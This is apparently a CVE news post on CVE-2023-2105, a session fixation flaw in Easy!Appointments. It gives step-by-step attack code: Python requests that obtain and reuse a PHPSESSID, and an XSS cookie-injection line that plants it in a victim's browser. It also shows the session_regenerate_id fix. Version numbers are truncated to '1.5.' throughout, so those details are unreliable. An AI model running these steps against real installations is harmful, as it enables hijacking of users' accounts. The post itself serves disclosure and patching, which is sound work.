CVE CyberSecurity Database News

CVE-2023-2105 - Session Fixation Vulnerability in Easy!Appointments (Before v1.5.) — How It Works and How to Exploit It

Poster -

Easy!Appointments is a popular open-source appointment scheduling application used by thousands worldwide. But if you’re running any version before 1.5., your application is susceptible to a security flaw — Session Fixation (CVE-2023-2105). In this post, we explain what this vulnerability is, show you step-by-step how an attacker might exploit it, and give pointers on patching and prevention.

What is Session Fixation?

Normally, when a user logs in, a new session (cookie) is created. Session fixation happens when an attacker forces a known session identifier (session ID) on a user. If the app does not create a new session after login, the attacker can hijack the victim’s account after they log in.

*In easier words: Imagine someone handing you a hotel key card, then later using a copy of that same card to open your room.*

Where’s the Bug in Easy!Appointments?

The bug exists in how Easy!Appointments uses PHP sessions and cookies. When a user logs in, the application does not generate a new session ID. That means if an attacker can set a session cookie for you before you log in, they can use that cookie to impersonate you after you authenticate.

Reference in GitHub:  
alextselegidis/easyappointments: Changelog (1.5.)  
NVD page:  
https://nvd.nist.gov/vuln/detail/CVE-2023-2105

Attacker gets a valid session ID from Easy!Appointments.

2. Attacker tricks the victim into using this session ID (e.g., via a phishing link or by injecting the PHPSESSID cookie using XSS).
3. Victim logs in — but since the session ID doesn’t change, it remains valid for both the victim and attacker.

Step 1: Attacker Gets a Session ID

import requests

url = "https://victim.com/easyappointments/";
sess = requests.session()
sess.get(url)
print(sess.cookies['PHPSESSID'])
# Output: abcde12345

Step 2: Attacker Lures the Victim

The attacker can craft a link that sets the session cookie, for example through social engineering or by exploiting XSS:

// JavaScript (if XSS possible)
document.cookie = "PHPSESSID=abcde12345; path=/; domain=victim.com";
window.location = "https://victim.com/easyappointments/index.php";;

Step 3: Victim Logs In

The victim now logs in using the session ID abcde12345.

The attacker reuses that session ID to access the victim’s account

cookies = {'PHPSESSID': 'abcde12345'}
protected_url = "https://victim.com/easyappointments/index.php";
response = requests.get(protected_url, cookies=cookies)
# Attacker now has access as the logged-in victim
print(response.text)  # Attacker sees victim data

Code Fix in v1.5.

Starting from Easy!Appointments 1.5., the app regenerates the session after login using session_regenerate_id(), preventing fixation.

Relevant Fix Example

if ($login_successful) {
    session_regenerate_id(true); // This is the correct fix
    // ... continue login routine ...
}

Upgrade to v1.5. or above immediately:

Download latest Easy!Appointments

Manually patch if upgrade not possible:

Add session_regenerate_id(true); immediately after successful login and before setting any sensitive session variables.

Monitor for suspicious session sharing activity.

## Further Reading / References

- Original GitHub Issue #935
- Official Release Notes
- OWASP - Session Fixation


> In short:  
CVE-2023-2105 makes it possible for an attacker to hijack user sessions in Easy!Appointments before 1.5. through session fixation. Upgrading your installation or patching your login code is crucial.

Timeline

Published on: 04/15/2023 14:15:00 UTC
Last modified on: 04/24/2023 19:16:00 UTC